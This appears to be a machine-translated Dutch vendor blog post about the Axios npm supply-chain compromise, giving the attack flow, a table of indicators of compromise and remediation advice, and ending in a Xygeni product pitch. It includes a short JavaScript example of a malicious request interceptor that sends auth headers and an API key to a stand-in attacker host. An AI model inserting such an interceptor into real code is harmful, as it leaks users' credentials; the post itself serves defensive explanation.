TL; DR
Het compromis van Axios npm laat zien hoe moderne aanvallen op de toeleveringsketen Er werd misbruik gemaakt van vertrouwde afhankelijkheden om tijdens de uitvoering toegang te krijgen tot gevoelige gegevens. Dit incident is door meerdere beveiligingsonderzoekers geanalyseerd, inclusief gedetailleerde analyses van onder andere: Unit42 Brancheverslaggeving die de aandacht vestigt op toeschrijvingspatronen die verband houden met activiteiten van natiestaten.
Dit incident betreft:
- DevOps-teams die CI/CD pipelinemet omgevingsgebaseerde authenticatie
- Backendservices die geauthenticeerde API-verzoeken afhandelen
- Applicaties die Axios gebruiken voor interne en externe HTTP-communicatie.
Omdat Axios zich in de aanvraaglaag bevindt, kan een gecompromitteerde versie toegang krijgen tot:
- Autorisatieheaders en API-tokens
- Omgevingsvariabelen en geheimen
- Interne servicecommunicatie
De werkelijke impact zit hem niet in de afhankelijkheid zelf, maar in wat er toegankelijk is zodra deze is uitgevoerd.
Onmiddellijke acties:
- Vergrendel de afhankelijkheidsversies en controleer recente updates.
- Wissel API-sleutels, tokens en CI/CD geloofsbrieven
- Monitor uitgaande verzoeken en authenticatieactiviteit.
- Audit pipelines voor onthulde geheimen
Wat is er gebeurd tijdens de Axios npm-aanval?
Het Axios-incident past in een groeiend patroon van aanvallen op de toeleveringsketen, waarbij aanvallers zich richten op veelgebruikte afhankelijkheden in plaats van op kwetsbaarheden in applicaties.
Door een vertrouwd pakket te compromitteren, krijgen aanvallers gelijktijdig toegang tot uitvoering in duizenden omgevingen.
Omdat Axios een van de meest gebruikte HTTP-clients in het JavaScript-ecosysteem is, is het diep geïntegreerd in:
- Backend-services
- Frontend-applicaties
- CI/CD pipelines
Dit maakt het een waardevol doelwit.
Zodra een kwaadaardige versie is geïntroduceerd en uitgevoerd, erft deze dezelfde machtigingen als de applicatie die deze heeft geïmporteerd. Dat omvat toegang tot netwerkverkeer, inloggegevens en interne services.
Het compromis trok ook buiten de beveiligingswereld de aandacht, met berichten zoals die van Axios. dekking
wijzend op mogelijke verbanden met geavanceerde cybercriminelen en gecoördineerde campagnes.
Wat de Axios-aanval daadwerkelijk doet tijdens de uitvoering.
De sleutel tot het begrijpen van deze aanval ligt in het focussen op het gedrag tijdens de uitvoering.
Axios opereert op de HTTP-laag, wat betekent dat het uitgaande verzoeken afhandelt. Hierdoor heeft het direct inzicht in gevoelige gegevens die door de applicatie stromen.
Een aangepaste versie kan:
- Onderschep uitgaande verzoeken voordat ze worden verzonden.
- vangen
Authorizationheaders en API-tokens - Toegang tot omgevingsvariabelen via
process.env - Observeer de communicatie tussen interne diensten.
Een kwaadwillende onderschepper kan bijvoorbeeld authenticatieheaders extraheren en deze stilletjes doorsturen naar een extern eindpunt.
Tegelijkertijd biedt toegang tot omgevingsvariabelen aanvallers de mogelijkheid om inloggegevens te achterhalen zonder de applicatielogica te hoeven aanpassen.
Van buitenaf gezien werkt alles naar behoren. Verzoeken worden succesvol afgerond, services reageren normaal en pipelinevertonen geen tekenen van storing. Tegelijkertijd kunnen gevoelige gegevens al blootgesteld zijn via achtergrondprocessen.
Axios-aanvalsproces: van gecompromitteerd pakket tot blootstelling van geheime gegevens
1. Compromis
Een aanvaller verkrijgt controle over een vertrouwd beheerdersaccount of een releasepad voor pakketten binnen het Axios-ecosysteem.
2. Distributie
Kwaadaardige versies worden gepubliceerd op npm en gedownload naar de machines van ontwikkelaars. CI/CD pipelineen applicatiebuilds via normale afhankelijkheidsupdates.
3. Uitvoering tijdens runtime
De payload wordt uitgevoerd wanneer axios wordt geïmporteerd en gebruikt, en erft dezelfde runtime-rechten als de applicatie.
4. Geheime toegang
De gecompromitteerde afhankelijkheid krijgt inzicht in headers, tokens, omgevingsvariabelen en interne HTTP-communicatie.
5. Exfiltratie
Gevoelige gegevens worden stilletjes naar een door de aanvaller beheerde infrastructuur verzonden, terwijl de oorspronkelijke verzoeken gewoon blijven functioneren.
Indicatoren van compromis (IoC's)
Om mogelijke blootstelling te onderzoeken, moeten teams beginnen met het bekijken van bekende indicatoren die verband houden met de Axios-compromis. De onderstaande tabel vat de meest relevante signalen samen, verdeeld over pakketten, netwerkactiviteit en host-artefacten.
Hoe deze IoC's te interpreteren
Hoewel deze indicatoren nuttig zijn, mogen ze niet als een complete detectiestrategie worden beschouwd.
In de praktijk zijn dit soort aanvallen zelden afhankelijk van één enkel statisch signaal. Domeinen veranderen, payloads evolueren en hashes raken snel verouderd. Wat wel constant blijft, is het gedrag.
Onverwachte uitgaande verzoeken tijdens normale HTTP-uitvoering kunnen bijvoorbeeld wijzen op datalekken. Ook het gebruik van geldige inloggegevens in ongebruikelijke contexten duidt er vaak op dat geheimen al zijn blootgesteld.
Op hostniveau kan de aanwezigheid van tijdelijke scripts of binaire bestanden wijzen op activiteiten na een aanval, vooral in combinatie met netwerkanomalieën.
Met andere woorden, IoC's helpen je een incident te bevestigen.
Het is echter door gedrag te begrijpen dat je het vroegtijdig kunt herkennen.
| Categorie | Indicator | Details |
|---|---|---|
| Pakket | axios@1.14.1 |
shasum: 2553649f2322049666871cea80a5d0d6adc700ca |
| Pakket | axios@0.30.4 |
shasum: d6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71 |
| Afhankelijkheid | plain-crypto-js@4.2.1 |
shasum: 07d889e2dadce6f3910dcbc253317d28ca61c766 |
| Netwerk | sfrclak[.]com |
Command-and-control-domein |
| Netwerk | 142.11.206[.]73 |
Bijbehorende infrastructuur IP |
| Netwerk | http://sfrclak[.]com:8000/6202033 |
Waargenomen exfiltratie-eindpunt |
| macOS | /Library/Caches/com.apple.act.mond |
SHA256: 92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a |
| Windows | %PROGRAMDATA%\wt.exe |
Potentiële persistentie-artefact |
| Windows | %TEMP%\6202033.vbs |
Scriptgebaseerd uitvoeringsartefact |
| Windows | %TEMP%\6202033.ps1 |
PowerShell-payload. SHA256: 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101 |
| Linux | /tmp/ld.py |
SHA256: fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf |
Onderzoeksnotitie: Deze IoC's (Indicators of Compromise) zijn een nuttig startpunt voor het opsporen van bedreigingen. Aanvallers kunnen echter snel van domein, payload en artefacten wisselen. Daarom moeten teams deze indicatoren correleren met gedragssignalen, zoals onverwacht uitgaand HTTP-verkeer en afwijkende toegang tot bepaalde systemen. process.enven ongebruikelijke afhankelijkheidsupdates.
Voorbeeld: Hoe een gecompromitteerde Axios npm-afhankelijkheid gegevens kan lekken.
Om te begrijpen hoe deze Axios npm-aanval in de praktijk werkt, nemen we een vereenvoudigd voorbeeld.
Axios stelt ontwikkelaars in staat om request-interceptors te definiëren. Deze interceptors worden automatisch uitgevoerd vóór elk HTTP-verzoek.
Een kwaadaardige versie van Axios kan misbruik maken van dit mechanisme:
const axios = require("axios");
// Malicious interceptor injected into dependency
axios.interceptors.request.use((config) => {
try {
const sensitiveData = {
url: config.url,
method: config.method,
headers: config.headers,
token: process.env.API_KEY,
};
require("https").request({
hostname: "attacker-domain.com",
path: "/collect",
method: "POST"
}).end(JSON.stringify(sensitiveData));
} catch (e) {}
return config;
});Waarom een Axios npm-aanval gevaarlijk is
Op het eerste gezicht lijkt er niets mis te zijn. Het verzoek wordt succesvol uitgevoerd, de applicatie werkt zoals verwacht en pipelineDe tests verlopen zonder fouten.
Het cruciale detail doet zich echter voor vóórdat het verzoek wordt verzonden. Tijdens die uitvoeringsperiode kan de gecompromitteerde afhankelijkheid ongemerkt toegang krijgen tot gevoelige gegevens en deze verzamelen, zoals autorisatieheaders, API-tokens, verzoekmetadata en omgevingsvariabelen.
Omdat deze logica wordt uitgevoerd binnen een vertrouwde bibliotheek die zich direct in het HTTP-verzoekpad bevindt, opereert deze feitelijk met dezelfde privileges als de applicatie zelf. Hierdoor heeft de bibliotheek toegang tot gegevens die normaal gesproken beschermd zouden zijn tegen externe aanvallers.
Wat dit bijzonder gevaarlijk maakt, is niet alleen de toegang tot de gegevens, maar ook het gebrek aan zichtbare gevolgen. Er is geen verstoring van de functionaliteit, geen mislukte verzoeken en geen direct signaal dat er iets mis is. Vanuit operationeel oogpunt blijft alles naar behoren werken.
Ondertussen kan gevoelige informatie het systeem al verlaten via uitgaande verbindingen die opgaan in het normale applicatieverkeer.
Waarom dit allereerst een DevOps-probleem is
Voor DevOps-teams is dit type aanval bijzonder moeilijk te detecteren, omdat het naadloos in bestaande workflows integreert.
Afhankelijkheden worden automatisch geïnstalleerd. pipelineDe processen worden normaal uitgevoerd en er treden geen onmiddellijke fouten op.
Op hetzelfde moment, CI/CD Omgevingen leggen vaak waardevolle inloggegevens bloot, waaronder:
- Cloudprovider-tokens
- Implementatiesleutels
- CI/CD authenticatiegeheimen
Een gecompromitteerde afhankelijkheid die in deze context draait, kan rechtstreeks toegang krijgen tot die inloggegevens.
Dit creëert een situatie waarin alles normaal lijkt, terwijl er op de achtergrond toegang wordt verkregen tot gevoelige gegevens.
Het werkelijke risico: grootschalige onthulling van geheime informatie.
De inbreuk op axios npm laat een belangrijke verschuiving in moderne aanvalsstrategieën zien.
Het doel is niet langer om kwetsbaarheden te misbruiken, maar om toegang te krijgen tot geldige inloggegevens.
Omdat moderne systemen afhankelijk zijn van omgevingsgebaseerde authenticatie, kan een afhankelijkheid die tijdens de uitvoering actief is, toegang krijgen tot:
- API-sleutels
- Servicetokens
- Cloud-referenties
Deze inloggegevens hoeven niet te worden gekraakt.
Ze hoeven alleen maar gebruikt te worden.
Dit stelt aanvallers in staat zich lateraal te verplaatsen, toegang te krijgen tot services en gegevens te extraheren met behulp van legitieme authenticatie.
Het gevolg is dat de impact afhangt van welke geheimen worden blootgelegd, en niet van hoe de aanval wordt uitgevoerd.
Waarom traditionele beveiligingsinstrumenten dit over het hoofd zien
Traditionele methoden hebben moeite om deze aanvallen te detecteren omdat ze zich richten op bekende kwetsbaarheden of statische signaturen. Zoals echter benadrukt in Analyse van OpenAI Bij de compromissen in de Axios-ontwikkelaarstools ontstaat het werkelijke risico tijdens de uitvoering, wanneer vertrouwde afhankelijkheden interactie hebben met gevoelige gegevens.
Een verstoorde afhankelijkheid hoeft echter geen duidelijke signalen te vertonen.
Er kan zijn:
- Geen CVE
- Geen kwaadaardige handtekening
- Geen afwijkende syntaxis
Tegelijkertijd evalueert statische analyse het runtimegedrag niet. Het kan niet vaststellen hoe een afhankelijkheid omgaat met gevoelige gegevens zodra deze is uitgevoerd.
Dit creëert een kloof waarbij code tijdens de analyse veilig lijkt, maar tijdens de uitvoering risicovol wordt.
Hoe Axios npm-achtige aanvallen te detecteren en te voorkomen
Om dit soort Axios npm-aanvallen te voorkomen, is een verschuiving nodig van statische inspectie naar runtime-bewustzijn.
Teams moeten inzicht hebben in hoe afhankelijkheden zich gedragen, niet alleen in wat ze bevatten.
Dit bevat:
- Toegang tot gevoelige gegevens tijdens de uitvoering bewaken.
- Het opsporen van geheimen voordat ze de opslagplaatsen bereiken.
- Het scannen pipelines en artefacten voor blootgestelde referenties
- Het monitoren van uitgaande netwerkactiviteit op afwijkingen.
Detectie alleen is echter niet voldoende.
Van opsporing naar preventie: wat vermindert het risico nu echt?
Na een dergelijk incident worden teams vaak geconfronteerd met een groot aantal mogelijk blootgestelde inloggegevens.
De uitdaging is niet om ze te vinden, maar om te bepalen welke ertoe doen.
De cruciale vraag luidt dan:
Welke geheimen zijn nog steeds geldig en exploiteerbaar?
Zonder verificatie besteden teams tijd aan inactieve inloggegevens, terwijl reële risico's blijven bestaan.
Een effectieve reactie vereist:
- Het opsporen van gelekte geheimen
- Controleren of ze nog steeds toegang verlenen
- Ze snel intrekken of roteren.
Dit verkort de blootstellingstijd en beperkt de mogelijkheden van de aanvaller.
Hoe Xygeni helpt het risico in de toeleveringsketen te verminderen
Xygeni Dit pakt deze uitdaging aan door detectie, verificatie en herstel te combineren in één workflow.
Het identificeert continu blootgestelde geheimen in de code. pipelineen artefacten. Tegelijkertijd wordt gecontroleerd of die inloggegevens nog steeds actief zijn in de omgeving.
Dit stelt teams in staat zich te concentreren op wat aanvallers daadwerkelijk zouden kunnen gebruiken.
Zodra actieve geheimen zijn geïdentificeerd, helpen geautomatiseerde herstelworkflows de blootstellingstijd te verkorten door intrekking of gecontroleerde rotatie.
Hierdoor wordt de reactie sneller en nauwkeuriger.cise, en minder storend.
Conclusie
De inbreuk op axios npm laat zien hoe aanvallen op de toeleveringsketen zich ontwikkelen.
Aanvallers hoeven systemen niet langer te kraken. Ze vertrouwen op vertrouwde afhankelijkheden om tijdens de uitvoering toegang te krijgen tot gevoelige gegevens.
Voor DevOps-teams betekent dit inzicht in het runtimegedrag. Voor beveiligingsmanagers betekent dit dat ze de risico's snel en effectief kunnen beperken.
Want in moderne omgevingen is het grootste risico niet wat er daadwerkelijk wordt uitgevoerd.
Het is datgene waartoe toegang wordt verkregen zodra het programma wordt uitgevoerd.
